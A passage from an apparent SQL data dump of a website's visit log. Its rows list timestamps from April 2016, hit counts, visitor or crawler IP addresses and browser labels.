0,0,'66.249.75.81','other'),(36065,1460964899,4,1,3,0,'66.249.69.239',''),(36066,1460965444,2,0,2,0,'66.249.69.244',''),(36067,1460965509,4,3,1,0,'66.249.69.239',''),(36068,1460965945,1,1,0,0,'66.249.69.244','other'),(36069,1460966520,1,1,0,0,'91.196.178.162','chrome'),(36070,1460967211,1,1,0,0,'66.249.69.239','other'),(36071,1460967857,1,1,0,0,'66.249.75.88','other'),(36072,1460971054,1,1,0,0,'91.196.178.72','firefox'),(36073,1460971424,1,1,0,0,'94.178.147.59','firefox'),(36074,1460971761,1,1,0,0,'5.255.253.113','other'),(36075,1460971893,1,1,0,0,'141.8.183.25','other'),(36076,1460972423,1,1,0,0,'141.8.132.99','other'),(36077,1460972873,1,1,0,0,'91.196.178.65','chrome'),(36078,1460973668,1,1,0,0,'180.76.15.19','other'),(36079,1460977473,1,1,0,0,'91.196.178.131','other'),(36080,1460980016,1,1,0,0,'91.196.178.65','firefox'),(36081,1460981256,1,1,0,0,'66.249.69.244','chrome'),(36082,1460982867,1,1,0,0,'91.196.178.68','firefox'),(36083,1460984534,1,0,1,0,'66.249.69.249',''),(36084,1460984569,2,0,2,0,'66.249.69.244',''),(36085,1460984615,1,0,1,0,'66.249.69.239',''),(36086,1460986301,1,1,0,0,'91.196.178.68','firefox'),(36087,1460986367,1,1,0,0,'66.249.69.249','other'),(36088,1460986398,1,1,0,0,'66.249.69.239','other'),(36089,1460987160,1,0,1,0,'66.249.75.95',''),(36090,1460987490,1,0,1,0,'66.249.69.249',''),(36091,1460988248,1,1,0,0,'130.193.51.14','other'),(36092,1460988653,1,1,0,0,'91.124.181.69','firefox'),(36093,1460990583,1,1,0,0,'141.8.142.25','other'),(36094,1460990781,2,2,0,0,'195.64.255.228','chrome'),(36095,1460997070,1,1,0,0,'91.196.178.33','firefox'),(36096,1460997418,1,1,0,0,'66.249.75.81','other'),(36097,1460997672,2,2,0,0,'66.249.69.244','other'),(36098,1460997692,5,5,0,0,'66.249.69.239','other'),(36099,1460998189,1,1,0,0,'66.249.75.88','other'),(36100,1460998678,1,1,0,0,'66.249.69.249','other'),(36101,1460999074,1,1,0,0,'66.249.69.244','other'),(36102,1460999549,1,1,0,0,'91.196.178.35','chrome'),(36103,1460999761,1,1,0,0,'91.196.178.69','firefox'),(36104,1460999951,1,1,0,0,'66.249.75.81','other'),(36105,1461000330,1,1,0,0,'180.76.15.10','other'),(36106,1461005573,1,0,1,0,'66.249.69.249',''),(36107,1461011729,1,0,1,0,'66.249.69.249',''),(36108,1461011902,2,2,0,0,'91.196.177.63','firefox'),(36109,1461012305,1,0,1,0,'66.249.69.244',''),(36110,1461012744,1,0,1,0,'66.249.69.249',''),(36111,1461016503,2,0,2,0,'66.249.69.244',''),(36112,1461018739,1,0,1,0,'66.249.69.249',''),(36113,1461021136,1,1,0,0,'141.8.142.67','other'),(36114,1461021449,1,0,1,0,'66.249.69.239',''),(36115,1461021617,2,0,2,0,'66.249.69.249',''),(36116,1461023530,1,1,0,0,'130.193.50.34','other'),(36117,1461025032,1,0,1,0,'66.249.75.81',''),(36118,1461025354,1,1,0,0,'66.249.69.239','chrome'),(36119,1461026560,2,0,2,0,'66.249.69.249',''),(36120,1461027543,1,0,1,0,'66.249.75.88',''),(36121,1461027681,1,1,0,0,'66.249.69.249','chrome'),(36122,1461029422,1,1,0,0,'66.249.69.244','chrome'),(36123,1461029501,1,1,0,0,'66.249.69.249','chrome'),(36124,1461029736,1,0,1,0,'66.249.69.239',''),(36125,1461030355,1,0,1,0,'66.249.75.88',''),(36126,1461030784,1,0,1,0,'66.249.69.249',''),(36127,1461031483,1,0,1,0,'66.249.69.239',''),(36128,1461031599,1,0,1,0,'66.249.75.81',''),(36129,1461031887,1,0,1,0,'66.249.75.95',''),(36130,1461032637,1,1,0,0,'66.249.69.244','chrome'),(36131,1461037219,1,0,1,0,'66.249.75.95',''),(36132,1461037558,1,0,1,0,'66.249.69.244',''),(36133,1461038722,1,1,0,0,'188.166.44.139','other'),(36134,1461038845,1,1,0,0,'66.249.69.249','chrome'),(36135,1461038877,3,3,0,0,'66.249.69.239','chrome'),(36136,1461039027,2,2,0,0,'66.249.69.244','chrome'),(36137,1461039580,1,1,0,0,'66.249.75.95','chrome'),(36138,1461039646,1,1,0,0,'66.249.75.88','chrome'),(36139,1461040071,2,1,1,0,'66.249.69.239',''),(36140,1461040184,1,1,0,0,'66.249.69.244','chrome'),(36141,1461041268,1,1,0,0,'91.196.178.71','chrome'),(36142,1461041971,1,1,0,0,'94.179.59.124','chrome'),(36143,1461043519,1,1,0,0,'66.249.93.153','chrome'),(36144,1461044523,1,0,1,0,'66.249.69.244',''),(36145,1461045634,2,2,0,0,'91.196.178.68','firefox'),(36146,1461046156,1,1,0,0,'91.196.178.71','chrome'),(36147,1461046568,1,1,0,0,'91.196.178.68','firefox'),(36148,1461047011,1,0,1,0,'66.249.75.95',''),(36149,1461047542,1,1,0,0,'91.196.178.67','chrome'),(36150,1461047573,1,1,0,0,'93.73.234.193','firefox'),(36151,1461049087,1,1,0,0,'180.76.15.7','other'),(36152,1461049631,1,1,0,0,'66.249.75.81','chrome'),(36153,1461052244,1,0,1,0,'66.249.69.244',''),(36154,1461053025,1,1,0,0,'91.196.178.67','chrome'),(36155,1461053563,1,1,0,0,'91.196.178.68','firefox'),(36156,1461053640,1,1,0,0,'92.113.126.25','chrome'),(36157,1461055020,1,1,0,0,'91.196.178.68','firefox'),(36158,1461055189,1,1,0,0,'130.193.50.34','other'),(36159,1461055547,1,1,0,0,'37.53.230.189','firefox'),(36160,1461055818,1,1,0,0,'52.33.33.74','opera'),(36161,1461057169,1,0,1,0,'66.249.75.95',''),(36162,1461057366,1,1,0,0,'91.196.178.67','firefox'),(36163,1461058255,1,0,1,0,'66.249.75.88',''),(36164,1461058549,1,1,0,0,'130.193.50.34','other'),(36165,1461058557,1,1,0,0,'141.8.183.25','other'),(36166,1461059786,1,0,1,0,'66.249.69.244',''),(36167,1461059990,1,1,0,0,'91.196.178.67','chrome'),(36168,1461060418,2,2,0,0,'91.196.178.68','firefox'),(36169,1461061261,1,0,1,0,'66.249.69.249',''),(36170,1461061378,1,1,0,0,'91.196.178.67','firefox'),(36171,1461065533,1,0,1,0,'66.249.66.57',''),(36172,1461066245,2,2,0,0,'94.179.105.72','firefox'),(36173,1461067878,1,1,0,0,'91.196.178.33','firefox'),(36174,1461068430,1,1,0,0,'94.179.105.72','firefox'),(36175,1461068586,1,1,0,0,'91.196.178.68','firefox'),(36176,1461069513,1,1,0,0,'157.55.39.236','other'),(36177,1461069726,1,1,0,0,'91.196.178.66','firefox'),(36178,1461069864,2,0,2,0,'66.249.66.76',''),(36179,1461070530,1,0,1,0,'66.249.66.57',''),(36180,1461071003,1,0,1,0,'66.249.66.82',''),(36181,1461073457,1,1,0,0,'95.67.72.214','firefox'),(36182,1461075636,1,1,0,0,'180.76.15.147','other'),(36183,1461076102,1,1,0,0,'91.196.178.66','firefox'),(36184,1461079047,1,1,0,0,'91.124.181.69','firefox'),(36185,1461080881,1,1,0,0,'212.90.62.87','chrome'),(36186,1461083434,1,1,0,0,'91.124.181.69','firefox'),(36187,1461083871,1,0,1,0,'66.249.66.76',''),(36188,1461084377,1,1,0,0,'188.166.50.4','other'),(36189,1461085599,3,3,0,0,'188.166.50.4','other'),(36190,1461086366,1,1,0,0,'91.196.178.99','chrome'),(36191,1461086973,1,1,0,0,'82.145.210.249','other'),(36192,1461086998,1,0,1,0,'66.249.66.54',''),(36193,1461087010,1,0,1,0,'66.249.66.57',''),(36194,1461088324,1,1,0,0,'66.249.66.54','chrome'),(36195,1461089165,1,1,0,0,'130.193.51.14','other'),(36196,1461089225,1,1,0,0,'66.249.66.60','chrome'),(36197,1461089877,1,1,0,0,'66.249.66.57','chrome'),(36198,1461091656,1,1,0,0,'194.44.132.97','chrome'),(36199,1461091664,1,1,0,0,'66.249.66.54','chrome'),(36200,1461092347,1,1,0,0,'193.194.127.217','firefox'),(36201,1461093569,1,1,0,0,'93.158.152.61','other'),(36202,1461097177,1,1,0,0,'93.158.152.61','other'),(36203,1461097304,1,1,0,0,'178.154.189.31','other'),(36204,1461099462,1,1,0,0,'180.76.15.33','other'),(36205,1461103462,1,1,0,0,'180.76.15.159','other'),(36206,1461104737,1,0,1,0,'66.249.66.60',''),(36207,1461107470,1,1,0,0,'91.200.12.143','chrome'),(36208,1461108597,1,1,0,0,'91.200.12.143','chrome'),(36209,1461114118,1,1,0,0,'91.200.12.136','chrome'),(36210,1461114600,1,1,0,0,'66.249.66.54','chrome'),(36211,1461115181,1,1,0,0,'91.200.12.136','firefox'),(36212,1461115679,1,1,0,0,'66.249.66.57','chrome'),(36213,1461122860,1,1,0,0,'130.193.50.34','other'),(36214,1461123505,1,0,1,0,'66.249.66.54',''),(36215,1461125956,1,1,0,0,'141.0.14.46','opera'),(36216,1461127994,1,0,1,0,'66.249.66.82',''),(36217,1461128961,1,1,0,0,'94.179.66.201','chrome'),(36218,1461128997,1,1,0,0,'91.196.178.68','firefox'),(36219,1461130812,1,1,0,0,'91.196.178.68','firefox'),(36220,1461132022,1,1,0,0,'91.196.178.68','firefox'),(36221,1461133288,1,1,0,0,'66.249.93.185','chrome'),(36222,1461133927,1,1,0,0,'141.8.132.105','other'),(36223,1461134521,1,1,0,0,'91.196.178.68','chrome'),(36224,1461135566,1,1,0,0,'91.196.178.129','firefox'),(36225,1461135894,1,0,1,0,'66.249.66.60',''),(36226,1461137020,1,1,0,0,'91.196.178.68','firefox'),(36227,1461137066,1,1,0,0,'94.179.71.178','chrome'),(36228,1461138086,1,1,0,0,'91.196.178.68','firefox'),(36229,1461139672,1,1,0,0,'91.196.178.68','firefox'),(36230,1461139923,1,1,0,0,'94.179.126.101','firefox'),(36231,1461140703,3,3,0,0,'91.196.178.68','firefox'),(36232,1461141748,1,1,0,0,'91.196.178.68','firefox'),(36233,1461143204,2,0,2,0,'66.249.66.82',''),(36234,1461143227,4,0,4,0,'66.249.66.79',''),(36235,1461143232,6,0,6,0,'66.249.66.76',''),(36236,1461143256,17,1,16,0,'66.249.66.76',''),(36237,1461143494,1,1,0,0,'91.196.178.68','firefox'),(36238,1461143737,2,2,0,0,'141.8.184.107','chrome'),(36239,1461143935,3,3,0,0,'141.8.184.107','other'),(36240,1461144484,2,2,0,0,'91.196.178.68','firefox'),(36241,1461145275,1,1,0,0,'141.8.132.105','other'),(36242,1461150806,1,1,0,0,'94.179.21.223','firefox'),(36243,1461151161,1,0,1,0,'66.249.66.60',''),(36244,1461151791,1,1,0,0,'94.179.21.223','firefox'),(36245,1461152780,1,1,0,0,'91.196.178.68','firefox'),(36246,1461152943,1,1,0,0,'91.196.178.69','firefox'),(36247,1461154204,1,1,0,0,'91.196.178.129','firefox'),(36248,1461156027,1,1,0,0,'91.196.178.70','chrome'),(36249,1461156864,1,1,0,0,'94.179.21.223','firefox'),(36250,1461156947,1,1,0,0,'91.196.178.70','chrome'),(36251,1461157029,1,1,0,0,'91.196.178.66','firefox'),(36252,1461157558,1,1,0,0,'141.0.15.67','opera'),(36253,1461157929,1,1,0,0,'91.196.178.70','chrome'),(36254,1461158633,1,1,0,0,'91.196.178.66','firefox'),(36255,1461159506,1,1,0,0,'141.0.15.67','opera'),(36256,1461160734,2,2,0,0,'91.196.178.68','firefox'),(36257,1461160842,1,1,0,0,'141.0.15.67','opera'),(36258,1461161671,1,1,0,0,'91.196.178.33','firefox'),(36259,1461161746,1,1,0,0,'91.196.178.68','firefox'),(36260,1461161792,1,1,0,0,'141.8.142.25','other'),(36261,1461162606,1,1,0,0,'141.0.15.67','opera'),(36262,1461162661,1,1,0,0,'91.196.178.69','firefox'),(36263,1461164027,1,1,0,0,'91.124.181.69','firefox'),(36264,1461165568,1,1,0,0,'91.124.181.69','firefox'),(36265,1461165709,3,3,0,0,'130.193.50.34','other'),(36266,1461166209,1,1,0,0,'91.196.178.33','firefox'),(36267,1461166653,4,4,0,0,'141.8.132.105','other'),(36268,1461166974,1,1,0,0,'91.124.181.69','firefox'),(36269,1461167323,1,1,0,0,'130.193.50.34','other'),(36270,1461167601,1,1,0,0,'178.92.8.17','firefox'),(36271,1461168358,1,1,0,0,'91.196.178.33','firefox'),(36272,1461169093,1,1,0,0,'94.179.62.69','chrome'),(36273,1461170275,1,1,0,0,'141.0.15.207','other'),(36274,1461170622,1,1,0,0,'91.196.178.69','chrome'),(36275,1461170721,1,1,0,0,'82.145.208.227','other'),(36276,1461170779,1,1,0,0,'82.145.208.227','opera'),(36277,1461171090,1,1,0,0,'46.211.113.3','chrome'),(36278,1461171914,1,1,0,0,'82.145.208.227','other'),(36279,1461172412,2,2,0,0,'91.124.181.69','firefox'),(36280,1461173454,1,1,0,0,'91.196.178.70','firefox'),(36281,1461173537,1,1,0,0,'91.196.177.69','chrome'),(36282,1461174302,1,0,1,0,'66.249.66.57',''),(36283,1461174328,4,0,4,0,'66.249.66.54',''),(36284,1461174346,2,1,1,0,'66.249.66.54',''),(36285,1461174382,1,1,0,0,'66.249.66.54','other'),(36286,1461175324,1,1,0,0,'130.193.37.19','other'),(36287,1461176038,30,30,0,0,'130.193.50.34','other'),(36288,1461176244,2,2,0,0,'5.255.253.113','other'),(36289,1461176249,13,13,0,0,'141.8.132.105','other'),(36290,1461176342,4,4,0,0,'141.8.183.25','other'),(36291,1461176351,1,1,0,0,'93.158.152.84','other'),(36292,1461177978,1,1,0,0,'130.193.50.34','other'),(36293,1461180283,8,8,0,0,'141.8.132.105','other'),(36294,1461180910,14,14,0,0,'130.193.50.34','other'),(36295,1461180938,3,3,0,0,'5.255.253.113','other'),(36296,1461181213,3,3,0,0,'141.8.132.105','other'),(36297,1461181454,1,1,0,0,'141.8.183.25','other'),(36298,1461182042,9,9,0,0,'130.193.50.34','other'),(36299,1461182109,1,1,0,0,'5.255.253.113','other'),(36300,1461182410,2,2,0,0,'82.145.217.105','opera'),(36301,1461183031,19,19,0,0,'130.193.50.34','other'),(36302,1461183041,2,2,0,0,'141.8.183.25','other'),(36303,1461183162,8,8,0,0,'141.8.132.105','other'),(36304,1461183353,2,2,0,0,'5.255.253.113','other'),(36305,1461183549,1,0,1,0,'68.180.229.90',''),(36306,1461183951,1,1,0,0,'130.193.50.34','other'),(36307,1461184835,1,1,0,0,'141.8.132.105','other'),(36308,1461185601,10,10,0,0,'130.193.50.34','other'),(36309,1461185864,4,4,0,0,'141.8.132.105','other'),(36310,1461186075,4,4,0,0,'141.8.183.25','other'),(36311,1461186658,13,13,0,0,'130.193.50.34','other'),(36312,1461186814,2,2,0,0,'141.8.132.105','other'),(36313,1461186852,3,3,0,0,'5.255.253.113','other'),(36314,1461186987,3,3,0,0,'141.8.183.25','other'),(36315,1461187780,1,1,0,0,'141.8.132.101','other'),(36316,1461188539,21,21,0,0,'130.193.50.34','other'),(36317,1461188558,3,3,0,0,'141.8.132.105','other'),(36318,1461188629,6,6,0,0,'141.8.183.25','other'),(36319,1461188748,1,0,1,0,'66.249.66.54',''),(36320,1461189466,14,14,0,0,'141.8.132.105','other'),(36321,1461189476,21,21,0,0,'130.193.50.34','other'),(36322,1461189530,2,2,0,0,'5.255.253.113','other'),(36323,1461190422,11,11,0,0,'130.193.50.34','other'),(36324,1461190523,1,1,0,0,'141.8.132.52','other'),(36325,1461190533,2,2,0,0,'5.255.253.53','other'),(36326,1461190543,1,1,0,0,'130.193.51.45','other'),(36327,1461190603,1,1,0,0,'141.8.132.105','other'),(36328,1461190633,2,2,0,0,'5.255.253.26','other'),(36329,1461190682,1,1,0,0,'141.8.183.19','other'),(36331,1461190692,1,1,0,0,'141.8.132.41','other'),(36332,1461190702,2,2,0,0,'130.193.50.4','other'),(36333,1461191018,2,2,0,0,'93.158.152.51','other'),(36334,1461191276,1,1,0,0,'141.8.142.62','other'),(36335,1461191288,1,1,0,0,'141.8.142.78','other'),(36336,1461191353,1,1,0,0,'130.193.50.38','other'),(36337,1461191390,1,1,0,0,'178.154.149.11','other'),(36338,1461191506,16,16,0,0,'130.193.50.34','other'),(36339,1461191517,5,5,0,0,'141.8.132.105','other'),(36340,1461191560,1,1,0,0,'141.8.183.25','other'),(36341,1461192320,3,3,0,0,'5.255.253.113','other'),(36342,1461192420,7,7,0,0,'141.8.132.105','other'),(36343,1461192430,12,12,0,0,'130.193.50.34','other'),(36344,1461192510,3,3,0,0,'141.8.183.25','other'),(36345,1461193713,11,11,0,0,'130.193.50.34','other'),(36346,1461193997,1,1,0,0,'130.193.51.19','other'),(36347,1461194007,1,1,0,0,'130.193.51.83','other'),(36348,1461194017,1,1,0,0,'141.8.183.25','other'),(36349,1461194112,1,1,0,0,'141.8.132.105','other'),(36350,1461195417,6,6,0,0,'141.8.183.25','other'),(36351,1461195549,5,5,0,0,'141.8.132.105','other'),(36352,1461195646,14,14,0,0,'130.193.50.34','other'),(36353,1461195727,1,1,0,0,'5.255.253.113','other'),(36354,1461195817,1,1,0,0,'93.158.152.9','other'),(36355,1461195847,2,2,0,0,'141.8.142.67','other'),(36356,1461195877,1,1,0,0,'130.193.51.74','other'),(36357,1461195878,1,1,0,0,'130.193.51.79','other'),(36358,1461195888,1,1,0,0,'141.8.142.62','other'),(36359,1461195898,1,1,0,0,'130.193.50.32','other'),(36360,1461195908,1,1,0,0,'5.255.253.26','other'),(36361,1461195918,2,2,0,0,'93.158.152.84','other'),(36362,1461196503,3,3,0,0,'141.8.132.105','other'),(36363,1461196612,1,1,0,0,'130.193.37.21','other'),(36364,1461196622,5,5,0,0,'130.193.50.34','other'),(36365,1461196690,1,1,0,0,'130.193.50.4','other'),(36366,1461196818,3,3,0,0,'5.255.253.113','other'),(36367,1461197692,19,19,0,0,'130.193.50.34','other'),(36368,1461197963,14,14,0,0,'141.8.132.105','other'),(36369,1461198115,3,3,0,0,'5.255.253.113','other'),(36370,1461198176,1,1,0,0,'141.8.183.25','other'),(36371,1461198880,8,8,0,0,'141.8.132.105','other'),(36372,1461198909,15,15,0,0,'130.193.50.34','other'),(36373,1461198919,1,1,0,0,'141.8.132.101','other'),(36374,1461198949,1,1,0,0,'130.193.51.19','other'),(36375,1461198959,1,1,0,0,'130.193.50.32','other'),(36376,1461198969,1,1,0,0,'5.255.253.36','other'),(36377,1461198989,1,1,0,0,'93.158.152.75','other'),(36378,1461198999,1,1,0,0,'93.158.152.51','other'),(36379,1461199009,1,1,0,0,'141.8.132.83','other'),(36380,1461199020,1,1,0,0,'141.8.132.30','other'),(36381,1461199029,1,1,0,0,'141.8.132.41','other'),(36382,1461199039,1,1,0,0,'5.255.253.26','other'),(36383,1461199073,1,1,0,0,'141.8.142.62','other'),(36384,1461199249,2,2,0,0,'5.255.253.113','other'),(36385,1461199329,1,1,0,0,'141.8.183.25','other'),(36386,1461200223,21,21,0,0,'130.193.50.34','other'),(36387,1461200358,14,14,0,0,'141.8.132.105','other'),(36388,1461200400,5,5,0,0,'141.8.183.25','other'),(36389,1461200410,3,3,0,0,'130.193.51.83','other'),(36390,1461200590,6,6,0,0,'5.255.253.113','other'),(36391,1461201295,20,20,0,0,'130.193.50.34','other'),(36392,1461201326,10,10,0,0,'141.8.132.105','other'),(36393,1461201379,1,0,1,0,'68.180.229.90',''),(36394,1461201407,7,7,0,0,'141.8.183.25','other'),(36395,1461201427,1,1,0,0,'141.8.142.67','other'),(36396,1461201567,1,1,0,0,'5.255.253.113','other'),(36397,1461202074,1,0,1,0,'66.249.66.82',''),(36398,1461202267,11,11,0,0,'141.8.132.105','other'),(36399,1461202526,23,23,0,0,'130.193.50.34','other'),(36400,1461202567,1,1,0,0,'47.16.91.216','chrome'),(36401,1461202676,4,4,0,0,'141.8.183.25','other'),(36402,1461203748,23,23,0,0,'130.193.50.34','other'),(36403,1461203774,12,12,0,0,'141.8.132.105','other'),(36404,1461203845,4,4,0,0,'141.8.183.25','other'),(36405,1461203885,2,2,0,0,'5.255.253.113','other'),(36406,1461204959,5,5,0,0,'141.8.183.25','other'),(36407,1461204969,28,28,0,0,'130.193.50.34','other'),(36408,1461205081,3,3,0,0,'5.255.253.113','other'),(36409,1461205222,1,1,0,0,'130.193.51.83','other'),(36410,1461205289,1,1,0,0,'141.8.142.78','other'),(36411,1461205299,1,1,0,0,'130.193.37.21','other'),(36412,1461205310,1,1,0,0,'130.193.51.19','other'),(36413,1461205330,1,1,0,0,'130.193.50.32','other'),(36414,1461205390,2,2,0,0,'141.8.132.105','other'),(36415,1461206193,30,30,0,0,'130.193.50.34','other'),(36416,1461206223,2,2,0,0,'141.8.183.25','other'),(36417,1461206334,8,8,0,0,'141.8.132.105','other'),(36418,1461206475,1,1,0,0,'5.255.253.113','other'),(36419,1461206555,1,1,0,0,'130.193.51.83','other'),(36420,1461207419,12,12,0,0,'130.193.50.34','other'),(36421,1461207977,11,11,0,0,'141.8.132.105','other'),(36422,1461208071,5,5,0,0,'141.8.183.25','other'),(36423,1461208192,3,3,0,0,'5.255.253.113','other'),(36424,1461208333,17,17,0,0,'130.193.50.34','other'),(36425,1461208951,1,1,0,0,'130.193.51.83','other'),(36426,1461209001,9,9,0,0,'141.8.132.105','other'),(36427,1461209012,7,7,0,0,'141.8.183.25','other'),(36428,1461209283,6,6,0,0,'5.255.253.113','other'),(36429,1461209303,11,11,0,0,'130.193.50.34','other'),(36430,1461210219,14,14,0,0,'130.193.50.34','other'),(36431,1461210230,1,1,0,0,'5.255.253.36','other'),(36432,1461210240,3,3,0,0,'130.193.37.21','other'),(36433,1461210250,1,1,0,0,'141.8.142.67','other'),(36434,1461210260,1,1,0,0,'130.193.50.38','other'),(36435,1461210270,2,2,0,0,'93.158.152.75','other'),(36436,1461210290,8,8,0,0,'141.8.132.105','other'),(36437,1461210310,1,1,0,0,'93.158.152.61','other'),(36438,1461210360,5,5,0,0,'5.255.253.113','other'),(36439,1461210431,1,1,0,0,'141.8.142.58','other'),(36440,1461210481,2,2,0,0,'141.8.183.25','other'),(36441,1461210511,1,1,0,0,'141.8.132.99','other'),(36442,1461210521,1,1,0,0,'130.193.51.83','other'),(36443,1461210531,1,1,0,0,'130.193.51.19','other'),(36444,1461211138,22,22,0,0,'130.193.50.34','other'),(36445,1461211229,11,11,0,0,'141.8.132.105','other'),(36446,1461212530,7,7,0,0,'130.193.50.34','other'),(36447,1461212862,4,4,0,0,'5.255.253.113','other'),(36448,1461212878,2,2,0,0,'130.193.50.38','other'),(36449,1461212893,3,3,0,0,'5.255.253.26','other'),(36450,1461212923,1,1,0,0,'130.193.50.4','other'),(36451,1461212944,2,2,0,0,'141.8.132.52','other'),(36452,1461213040,1,1,0,0,'141.8.142.78','other'),(36453,1461213050,3,3,0,0,'5.255.253.53','other'),(36454,1461213060,1,1,0,0,'141.8.142.62','other'),(36455,1461213070,1,1,0,0,'93.158.152.9','other'),(36456,1461213080,3,3,0,0,'93.158.152.46','other'),(36457,1461213088,1,1,0,0,'5.255.253.36','other'),(36458,1461213096,1,1,0,0,'5.255.253.47','other'),(36459,1461213111,1,1,0,0,'141.8.142.58','other'),(36460,1461213119,2,2,0,0,'141.8.142.67','other'),(36461,1461213134,2,2,0,0,'130.193.50.32','other'),(36462,1461213142,1,1,0,0,'130.193.51.74','other'),(36463,1461213157,1,1,0,0,'141.8.132.83','other'),(36464,1461213193,3,3,0,0,'141.8.132.105','other'),(36465,1461213202,1,1,0,0,'141.8.132.41','other'),(36466,1461213203,1,1,0,0,'178.154.149.10','other'),(36467,1461213273,1,1,0,0,'141.8.183.25','other'),(36468,1461214415,17,17,0,0,'130.193.50.34','other'),(36469,1461214751,5,5,0,0,'141.8.132.105','other'),(36470,1461214811,7,7,0,0,'141.8.183.25','other'),(36471,1461215643,1,1,0,0,'141.8.132.83','other'),(36472,1461215713,22,22,0,0,'130.193.50.34','other'),(36473,1461215723,10,10,0,0,'141.8.132.105','other'),(36474,1461215822,3,3,0,0,'141.8.183.25','other'),(36475,1461215873,5,5,0,0,'5.255.253.113','other'),(36476,1461216561,1,1,0,0,'91.196.178.68','firefox'),(36477,1461216622,11,11,0,0,'130.193.50.34','other'),(36478,1461216632,1,1,0,0,'130.193.51.19','other'),(36479,1461216662,3,3,0,0,'141.8.132.105','other'),(36480,1461217191,3,3,0,0,'141.8.183.25','other'),(36481,1461217327,6,6,0,0,'5.255.253.113','other'),(36482,1461217525,1,1,0,0,'91.196.178.68','firefox'),(36483,1461217868,15,15,0,0,'130.193.50.34','other'),(36484,1461218089,1,1,0,0,'66.249.93.147','chrome'),(36485,1461218172,11,11,0,0,'141.8.132.105','other'),(36486,1461218203,8,8,0,0,'141.8.183.25','other'),(36487,1461218303,1,1,0,0,'5.255.253.113','other'),(36488,1461218460,1,1,0,0,'91.196.178.68','firefox'),(36489,1461218965,17,17,0,0,'130.193.50.34','other'),(36490,1461218980,1,1,0,0,'130.193.51.83','other'),(36491,1461219105,12,12,0,0,'141.8.132.105','other'),(36492,1461219225,3,3,0,0,'141.8.183.25','other'),(36493,1461219375,1,1,0,0,'5.255.253.113','other'),(36494,1461219489,1,1,0,0,'180.76.15.143','other'),(36495,1461219892,1,1,0,0,'91.196.178.70','chrome'),(36496,1461219940,22,22,0,0,'130.193.50.34','other'),(36497,1461220051,1,1,0,0,'130.193.51.83','other'),(36498,1461220081,6,6,0,0,'141.8.132.105','other'),(36499,1461220306,5,5,0,0,'5.255.253.113','other'),(36500,1461220336,4,4,0,0,'141.8.183.25','other'),(36501,1461220856,16,16,0,0,'130.193.50.34','other'),(36502,1461221072,5,5,0,0,'141.8.132.105','other'),(36503,1461221258,7,7,0,0,'141.8.183.25','other'),(36504,1461221783,6,6,0,0,'5.255.253.113','other'),(36505,1461221803,23,23,0,0,'130.193.50.34','other'),(36506,1461221819,1,1,0,0,'79.135.218.247','chrome'),(36507,1461221994,9,9,0,0,'141.8.132.105','other'),(36508,1461222325,1,1,0,0,'94.179.9.175','firefox'),(36509,1461222720,18,18,0,0,'130.193.50.34','other'),(36510,1461222730,4,4,0,0,'141.8.183.25','other'),(36511,1461222919,5,5,0,0,'141.8.132.105','other'),(36512,1461223736,9,9,0,0,'141.8.183.25','other'),(36513,1461223858,12,12,0,0,'141.8.132.105','other'),(36514,1461223868,13,13,0,0,'130.193.50.34','other'),(36515,1461223878,6,6,0,0,'5.255.253.113','other'),(36516,1461224081,2,2,0,0,'130.193.51.83','other'),(36517,1461224232,1,1,0,0,'141.8.142.58','other'),(36518,1461224910,9,9,0,0,'141.8.132.105','other'),(36519,1461225146,13,13,0,0,'130.193.50.34','other'),(36520,1461225442,5,5,0,0,'5.255.253.113','other'),(36521,1461225457,8,8,0,0,'141.8.183.25','other'),(36522,1461225517,1,1,0,0,'130.193.51.83','other'),(36523,1461225931,14,14,0,0,'141.8.132.105','other'),(36524,1461226251,18,18,0,0,'130.193.50.34','other'),(36525,1461226386,1,1,0,0,'91.196.178.33','firefox'),(36526,1461226393,2,2,0,0,'5.255.253.113','other'),(36527,1461226403,2,2,0,0,'141.8.183.25','other'),(36528,1461226844,1,1,0,0,'5.255.253.53','other'),(36529,1461226854,1,1,0,0,'141.8.142.78','other'),(36530,1461226855,1,1,0,0,'93.158.152.84','other'),(36531,1461227211,1,1,0,0,'5.255.253.36','other'),(36532,1461227457,2,2,0,0,'141.8.183.19','other'),(36533,1461227504,1,1,0,0,'93.158.152.51','other'),(36534,1461228055,1,1,0,0,'91.196.178.70','chrome'),(36535,1461228095,2,2,0,0,'178.154.149.11','other'),(36536,1461228145,1,1,0,0,'94.179.9.175','firefox'),(36537,1461228146,2,2,0,0,'141.8.142.85','other'),(36538,1461228156,2,2,0,0,'93.158.152.75','other'),(36539,1461228176,1,1,0,0,'5.255.253.36','other'),(36540,1461228187,2,2,0,0,'130.193.51.45','other'),(36541,1461228197,2,2,0,0,'5.255.253.9','other'),(36542,1461228207,3,3,0,0,'141.8.132.52','other'),(36544,1461228234,2,2,0,0,'5.255.253.26','other'),(36545,1461228244,1,1,0,0,'141.8.142.62','other'),(36546,1461228254,1,1,0,0,'130.193.51.74','other'),(36547,1461228274,2,2,0,0,'141.8.132.41','other'),(36548,1461228284,2,2,0,0,'141.8.142.78','other'),(36549,1461228294,1,1,0,0,'5.255.253.53','other'),(36550,1461228305,2,2,0,0,'130.193.51.81','other'),(36551,1461228315,2,2,0,0,'141.8.184.11','other'),(36552,1461228325,1,1,0,0,'93.158.152.40','other'),(36553,1461228335,2,2,0,0,'93.158.152.46','other'),(36554,1461228345,2,2,0,0,'93.158.152.9','other'),(36555,1461228446,1,1,0,0,'130.193.50.4','other'),(36556,1461228467,1,1,0,0,'141.8.132.2','other'),(36557,1461228477,1,1,0,0,'141.8.142.67','other'),(36558,1461228486,1,1,0,0,'130.193.50.38','other'),(36559,1461228497,1,1,0,0,'141.8.132.83','other'),(36560,1461228696,5,5,0,0,'5.255.253.113','other'),(36561,1461228707,8,8,0,0,'130.193.50.34','other'),(36562,1461229402,2,2,0,0,'130.193.51.19','other'),(36563,1461229412,4,4,0,0,'130.193.51.83','other'),(36564,1461229433,4,4,0,0,'141.8.183.25','other'),(36565,1461229442,12,12,0,0,'141.8.132.105','other'),(36566,1461229613,6,6,0,0,'130.193.50.34','other'),(36567,1461229644,2,2,0,0,'5.255.253.113','other'),(36568,1461229694,1,1,0,0,'141.8.142.61','other'),(36569,1461230542,1,1,0,0,'91.196.178.67','firefox'),(36570,1461230597,8,8,0,0,'141.8.183.25','other'),(36571,1461230607,13,13,0,0,'130.193.50.34','other'),(36572,1461230627,9,9,0,0,'141.8.132.105','other'),(36573,1461230658,5,5,0,0,'5.255.253.113','other'),(36574,1461230790,1,1,0,0,'130.193.51.19','other'),(36575,1461230870,1,1,0,0,'130.193.51.83','other'),(36576,1461231564,13,13,0,0,'130.193.50.34','other'),